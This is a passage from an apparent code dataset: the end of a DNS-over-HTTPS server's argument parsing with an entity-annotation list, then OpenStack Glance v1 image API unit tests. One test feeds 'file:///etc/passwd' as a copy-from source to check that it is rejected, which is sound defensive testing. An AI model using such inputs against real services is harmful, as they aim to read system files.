'redis://localhost:6379/0'), help=""redis connection string"") + + # Application settings + parser.add_argument(""--doh"", help=""use DNS-over-HTTPS and treat --resolver as DNS-over-HTTPS capable (beta)"", action=""store_true"") + parser.add_argument(""--records"", default=os.getenv('RECORDS', 
""A,AAAA,CAA,CNAME,DS,DNSKEY,MX,NS,NSEC,NSEC3,RRSIG,SOA,TXT""), help=""supported records"") + parser.add_argument(""--resolver"", default=os.getenv('RESOLVER', '127.0.0.1'), help=""resolver address"") + + # Verbose mode + parser.add_argument(""--verbose"", ""-v"", help=""increase output verbosity"", action=""store_true"") + args = parser.parse_args() + + if args.verbose: + logging.basicConfig(level=logging.DEBUG) + else: + logging.basicConfig(level=logging.INFO) + log = logging.getLogger(__name__) + + try: + app = default_app() + app.run(host=args.host, port=args.port, server='tornado') + except: + log.error(""Unable to start server on {}:{}"".format(args.host, args.port))",5656,"[['LOCATION', 'json'], ['LOCATION', 'fn(*args'], ['LOCATION', 'fn(*args'], ['PERSON', 'NoAnswer'], ['PERSON', 'dirname'], ['PERSON', 'dirname'], ['PERSON', ""@route('/""], ['LOCATION', 'DNSKEY'], ['PERSON', 'help=""resolver'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'dns.re'], ['URL', 'request.headers.ge'], ['URL', 'request.headers.ge'], ['URL', 'request.me'], ['URL', 'request.me'], ['URL', 'args.do'], ['URL', 'requests.ge'], ['URL', 'args.re'], ['URL', 'dns.resolver.Re'], ['URL', 'resolver.na'], ['URL', 'args.re'], ['URL', 'args.re'], ['URL', 'resolver.re'], ['URL', 'data.ad'], ['URL', 'data.st'], ['URL', 'rec.de'], ['URL', 'dns.re'], ['URL', 'dns.resolver.No'], ['URL', 'dns.resolver.No'], ['URL', 'response.st'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'args.re'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'f.re'], ['URL', 'response.co'], ['URL', 'args.re'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'args.re'], ['URL', 'request.me'], ['URL', 'request.forms.ge'], ['URL', 'request.forms.ge'], ['URL', 'args.re'], ['URL', 'args.re'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'args.ve'], ['URL', 'logging.ba'], ['URL', 'logging.DE'], ['URL', 'logging.ba'], ['URL', 'logging.IN'], ['URL', 'logging.ge'], ['URL', 'app.ru'], ['URL', 'log.er']]" +23,"# vim: tabstop=4 shiftwidth=4 softtabstop=4 +# -*- coding: utf-8 -*- + +# Copyright 2010-2011 OpenStack, LLC +# All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the ""License""); you may +# not use this file except in compliance with the License. You may obtain +# a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT +# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the +# License for the specific language governing permissions and limitations +# under the License. 
+ +import copy +import datetime +import hashlib +import json +import StringIO + +from oslo.config import cfg +import routes +import six +import webob + +import glance.api +import glance.api.common +from glance.api.v1 import filters +from glance.api.v1 import images +from glance.api.v1 import router +from glance.common import exception +import glance.common.config +import glance.context +from glance.db.sqlalchemy import api as db_api +from glance.db.sqlalchemy import models as db_models +from glance.openstack.common import timeutils +from glance.openstack.common import uuidutils +import glance.store.filesystem +from glance.tests.unit import base +from glance.tests import utils as test_utils +import glance.tests.unit.utils as unit_test_utils + +CONF = cfg.CONF + +_gen_uuid = uuidutils.generate_uuid + +UUID1 = _gen_uuid() +UUID2 = _gen_uuid() + + +class TestGlanceAPI(base.IsolatedUnitTest): + def setUp(self): + """"""Establish a clean test environment"""""" + super(TestGlanceAPI, self).setUp() + self.mapper = routes.Mapper() + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper)) + self.FIXTURES = [ + {'id': UUID1, + 'name': 'fake image #1', + 'status': 'active', + 'disk_format': 'ami', + 'container_format': 'ami', + 'is_public': False, + 'created_at': timeutils.utcnow(), + 'updated_at': timeutils.utcnow(), + 'deleted_at': None, + 'deleted': False, + 'checksum': None, + 'size': 13, + 'locations': [{'url': ""file:///%s/%s"" % (self.test_dir, UUID1), + 'metadata': {}}], + 'properties': {'type': 'kernel'}}, + {'id': UUID2, + 'name': 'fake image #2', + 'status': 'active', + 'disk_format': 'vhd', + 'container_format': 'ovf', + 'is_public': True, + 'created_at': timeutils.utcnow(), + 'updated_at': timeutils.utcnow(), + 'deleted_at': None, + 'deleted': False, + 'checksum': 'abc123', + 'size': 19, + 'locations': [{'url': ""file:///%s/%s"" % (self.test_dir, UUID2), + 'metadata': {}}], + 'properties': {}}] + self.context = glance.context.RequestContext(is_admin=True) + db_api.setup_db_env() + db_api.get_engine() + self.destroy_fixtures() + self.create_fixtures() + + def tearDown(self): + """"""Clear the test environment"""""" + super(TestGlanceAPI, self).tearDown() + self.destroy_fixtures() + + def create_fixtures(self): + for fixture in self.FIXTURES: + db_api.image_create(self.context, fixture) + # We write a fake image file to the filesystem + with open(""%s/%s"" % (self.test_dir, fixture['id']), 'wb') as image: + image.write(""chunk00000remainder"") + image.flush() + + def destroy_fixtures(self): + # Easiest to just drop the models and re-create them... 
+ db_models.unregister_models(db_api._ENGINE) + db_models.register_models(db_api._ENGINE) + + def _do_test_defaulted_format(self, format_key, format_value): + fixture_headers = {'x-image-meta-name': 'defaulted', + 'x-image-meta-location': 'http://localhost:0/image', + format_key: format_value} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + res_body = json.loads(res.body)['image'] + self.assertEquals(format_value, res_body['disk_format']) + self.assertEquals(format_value, res_body['container_format']) + + def test_defaulted_amazon_format(self): + for key in ('x-image-meta-disk-format', + 'x-image-meta-container-format'): + for value in ('aki', 'ari', 'ami'): + self._do_test_defaulted_format(key, value) + + def test_bad_disk_format(self): + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'invalid', + 'x-image-meta-container-format': 'ami', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + self.assertTrue('Invalid disk format' in res.body, res.body) + + def test_configured_disk_format_good(self): + self.config(disk_formats=['foo']) + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'foo', + 'x-image-meta-container-format': 'bare', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + def test_configured_disk_format_bad(self): + self.config(disk_formats=['foo']) + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'bar', + 'x-image-meta-container-format': 'bare', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + self.assertTrue('Invalid disk format' in res.body, res.body) + + def test_configured_container_format_good(self): + self.config(container_formats=['foo']) + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'raw', + 'x-image-meta-container-format': 'foo', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + def test_configured_container_format_bad(self): + self.config(container_formats=['foo']) + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'raw', + 'x-image-meta-container-format': 'bar', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + 
self.assertEquals(res.status_int, 400) + self.assertTrue('Invalid container format' in res.body, res.body) + + def test_container_and_disk_amazon_format_differs(self): + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'aki', + 'x-image-meta-container-format': 'ami'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + expected = (""Invalid mix of disk and container formats. "" + ""When setting a disk or container format to one of "" + ""'aki', 'ari', or 'ami', "" + ""the container and disk formats must match."") + self.assertEquals(res.status_int, 400) + self.assertTrue(expected in res.body, res.body) + + def test_create_with_location_no_container_format(self): + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'vhd', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + self.assertTrue('Invalid container format' in res.body) + + def test_bad_container_format(self): + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'invalid', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + self.assertTrue('Invalid container format' in res.body) + + def test_bad_image_size(self): + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://example.com/image.tar.gz', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-size': 'invalid', + 'x-image-meta-container-format': 'bare', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + self.assertTrue('Incoming image size' in res.body) + + def test_bad_image_name(self): + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'X' * 256, + 'x-image-meta-location': 'http://example.com/image.tar.gz', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'bare', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_no_location_no_image_as_body(self): + """"""Tests creates a queued image for no body and no loc header"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals('queued', res_body['status']) + image_id = 
res_body['id'] + + # Test that we are able to edit the Location field + # per LP Bug #911599 + + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + req.headers['x-image-meta-location'] = 'http://localhost:0/images/123' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + res_body = json.loads(res.body)['image'] + # Once the location is set, the image should be activated + # see LP Bug #939484 + self.assertEquals('active', res_body['status']) + self.assertFalse('location' in res_body) # location never shown + + def test_add_image_no_location_no_content_type(self): + """"""Tests that an image body without a content type is rejected"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + req.body = ""chunk00000remainder"" + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_size_header_too_big(self): + """"""Tests raises BadRequest for supplied image size that is too big"""""" + fixture_headers = {'x-image-meta-size': CONF.image_size_cap + 1, + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_size_chunked_data_too_big(self): + self.config(image_size_cap=512) + fixture_headers = { + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-container_format': 'ami', + 'x-image-meta-disk_format': 'ami', + 'transfer-encoding': 'chunked', + 'content-type': 'application/octet-stream', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + + req.body_file = StringIO.StringIO('X' * (CONF.image_size_cap + 1)) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 413) + + def test_add_image_size_data_too_big(self): + self.config(image_size_cap=512) + fixture_headers = { + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-container_format': 'ami', + 'x-image-meta-disk_format': 'ami', + 'content-type': 'application/octet-stream', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + + req.body = 'X' * (CONF.image_size_cap + 1) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_size_header_exceed_quota(self): + quota = 500 + self.config(user_storage_quota=quota) + fixture_headers = {'x-image-meta-size': quota + 1, + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-container_format': 'bare', + 'x-image-meta-disk_format': 'qcow2', + 'content-type': 'application/octet-stream', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + req.body = 'X' * (quota + 1) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 413) + + def test_add_image_size_data_exceed_quota(self): + quota = 500 + self.config(user_storage_quota=quota) + fixture_headers = { + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-container_format': 'bare', + 'x-image-meta-disk_format': 'qcow2', + 'content-type': 'application/octet-stream', + } + + req = 
webob.Request.blank(""/images"") + req.method = 'POST' + + req.body = 'X' * (quota + 1) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 413) + + def test_add_image_size_data_exceed_quota_readd(self): + quota = 500 + self.config(user_storage_quota=quota) + fixture_headers = { + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-container_format': 'bare', + 'x-image-meta-disk_format': 'qcow2', + 'content-type': 'application/octet-stream', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + req.body = 'X' * (quota + 1) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 413) + + used_size = sum([f['size'] for f in self.FIXTURES]) + + req = webob.Request.blank(""/images"") + req.method = 'POST' + req.body = 'X' * (quota - used_size) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + def _add_check_no_url_info(self): + + fixture_headers = {'x-image-meta-disk-format': 'ami', + 'x-image-meta-container-format': 'ami', + 'x-image-meta-size': '0', + 'x-image-meta-name': 'empty image'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + res_body = json.loads(res.body)['image'] + self.assertFalse('locations' in res_body) + self.assertFalse('direct_url' in res_body) + image_id = res_body['id'] + + # HEAD empty image + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertFalse('x-image-meta-locations' in res.headers) + self.assertFalse('x-image-meta-direct_url' in res.headers) + + def test_add_check_no_url_info_ml(self): + self.config(show_multiple_locations=True) + self._add_check_no_url_info() + + def test_add_check_no_url_info_direct_url(self): + self.config(show_image_direct_url=True) + self._add_check_no_url_info() + + def test_add_check_no_url_info_both_on(self): + self.config(show_image_direct_url=True) + self.config(show_multiple_locations=True) + self._add_check_no_url_info() + + def test_add_check_no_url_info_both_off(self): + self._add_check_no_url_info() + + def test_add_image_zero_size(self): + """"""Tests creating an active image with explicitly zero size"""""" + fixture_headers = {'x-image-meta-disk-format': 'ami', + 'x-image-meta-container-format': 'ami', + 'x-image-meta-size': '0', + 'x-image-meta-name': 'empty image'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals('active', res_body['status']) + image_id = res_body['id'] + + # GET empty image + req = webob.Request.blank(""/images/%s"" % image_id) + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertEqual(len(res.body), 0) + + def _do_test_add_image_attribute_mismatch(self, attributes): + fixture_headers = { + 'x-image-meta-name': 'fake image #3', + } + fixture_headers.update(attributes) + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + 
req.body = ""XXXX"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_checksum_mismatch(self): + attributes = { + 'x-image-meta-checksum': 'asdf', + } + self._do_test_add_image_attribute_mismatch(attributes) + + def test_add_image_size_mismatch(self): + attributes = { + 'x-image-meta-size': str(len(""XXXX"") + 1), + } + self._do_test_add_image_attribute_mismatch(attributes) + + def test_add_image_checksum_and_size_mismatch(self): + attributes = { + 'x-image-meta-checksum': 'asdf', + 'x-image-meta-size': str(len(""XXXX"") + 1), + } + self._do_test_add_image_attribute_mismatch(attributes) + + def test_add_image_bad_store(self): + """"""Tests raises BadRequest for invalid store header"""""" + fixture_headers = {'x-image-meta-store': 'bad', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_basic_file_store(self): + """"""Tests to add a basic image in the file store"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + # Test that the Location: header is set to the URI to + # edit the newly-created image, as required by APP. 
+ # See LP Bug #719825 + self.assertTrue('location' in res.headers, + ""'location' not in response headers.\n"" + ""res.headerlist = %r"" % res.headerlist) + res_body = json.loads(res.body)['image'] + self.assertTrue('/images/%s' % res_body['id'] + in res.headers['location']) + self.assertEquals('active', res_body['status']) + image_id = res_body['id'] + + # Test that we are NOT able to edit the Location field + # per LP Bug #911599 + + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + req.headers['x-image-meta-location'] = 'http://example.com/images/123' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_image_unauthorized(self): + rules = {""add_image"": '!'} + self.set_policy_rules(rules) + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_add_publicize_image_unauthorized(self): + rules = {""add_image"": '@', ""modify_image"": '@', + ""publicize_image"": '!'} + self.set_policy_rules(rules) + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-is-public': 'true', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_add_publicize_image_authorized(self): + rules = {""add_image"": '@', ""modify_image"": '@', + ""publicize_image"": '@'} + self.set_policy_rules(rules) + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-is-public': 'true', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + def test_add_copy_from_image_unauthorized(self): + rules = {""add_image"": '@', ""copy_from"": '!'} + self.set_policy_rules(rules) + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-glance-api-copy-from': 'http://glance.com/i.ovf', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_add_copy_from_image_authorized(self): + rules = {""add_image"": '@', ""copy_from"": '@'} + self.set_policy_rules(rules) + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-glance-api-copy-from': 'http://glance.com/i.ovf', + 
'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + def test_add_copy_from_with_nonempty_body(self): + """"""Tests creates an image from copy-from and nonempty body"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-glance-api-copy-from': 'http://a/b/c.ovf', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F'} + + req = webob.Request.blank(""/images"") + req.headers['Content-Type'] = 'application/octet-stream' + req.method = 'POST' + req.body = ""chunk00000remainder"" + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_location_with_nonempty_body(self): + """"""Tests creates an image from location and nonempty body"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-location': 'http://a/b/c.tar.gz', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F'} + + req = webob.Request.blank(""/images"") + req.headers['Content-Type'] = 'application/octet-stream' + req.method = 'POST' + req.body = ""chunk00000remainder"" + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_add_location_with_conflict_image_size(self): + """"""Tests creates an image from location and conflict image size"""""" + + self.stubs.Set(glance.api.v1.images, 'get_size_from_backend', + lambda *args, **kwargs: 2) + + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-location': 'http://a/b/c.tar.gz', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F', + 'x-image-meta-size': '1'} + + req = webob.Request.blank(""/images"") + req.headers['Content-Type'] = 'application/octet-stream' + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 409) + + def test_add_copy_from_with_location(self): + """"""Tests creates an image from copy-from and location"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-glance-api-copy-from': 'http://a/b/c.ovf', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F', + 'x-image-meta-location': 'http://a/b/c.tar.gz'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def _do_test_post_image_content_missing_format(self, missing): + """"""Tests creation of an image with missing format"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + header = 'x-image-meta-' + missing.replace('_', '-') + + del fixture_headers[header] + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = 
""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEqual(res.status_int, 400) + + def test_add_copy_from_with_restricted_sources(self): + """"""Tests creates an image from copy-from with restricted sources"""""" + header_template = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #F'} + + schemas = [""file:///etc/passwd"", + ""swift+config:///xxx"", + ""filesystem:///etc/passwd""] + + for schema in schemas: + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in six.iteritems(header_template): + req.headers[k] = v + req.headers['x-glance-api-copy-from'] = schema + res = req.get_response(self.api) + self.assertEqual(400, res.status_int) + + def test_post_image_content_missing_disk_format(self): + """"""Tests creation of an image with missing disk format"""""" + self._do_test_post_image_content_missing_format('disk_format') + + def test_post_image_content_missing_container_type(self): + """"""Tests creation of an image with missing container format"""""" + self._do_test_post_image_content_missing_format('container_format') + + def _do_test_put_image_content_missing_format(self, missing): + """"""Tests delayed activation of an image with missing format"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + header = 'x-image-meta-' + missing.replace('_', '-') + + del fixture_headers[header] + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals('queued', res_body['status']) + image_id = res_body['id'] + + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_put_image_content_missing_disk_format(self): + """"""Tests delayed activation of image with missing disk format"""""" + self._do_test_put_image_content_missing_format('disk_format') + + def test_put_image_content_missing_container_type(self): + """"""Tests delayed activation of image with missing container format"""""" + self._do_test_put_image_content_missing_format('container_format') + + def test_update_deleted_image(self): + """"""Tests that exception raised trying to update a deleted image"""""" + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + fixture = {'name': 'test_del_img'} + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(image=fixture)) + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + self.assertTrue('Forbidden to update deleted image' in res.body) + + def test_delete_deleted_image(self): + """"""Tests that exception raised trying to delete a deleted image"""""" + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + # Verify the status is deleted + req = 
webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEqual(""deleted"", res.headers['x-image-meta-status']) + + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + msg = ""Image %s not found."" % UUID2 + self.assertTrue(msg in res.body) + + # Verify the status is still deleted + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEqual(""deleted"", res.headers['x-image-meta-status']) + + def test_delete_pending_delete_image(self): + """""" + Tests that correct response returned when deleting + a pending_delete image + """""" + # First deletion + self.config(delayed_delete=True, scrubber_datadir='/tmp/scrubber') + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + # Verify the status is pending_delete + req = 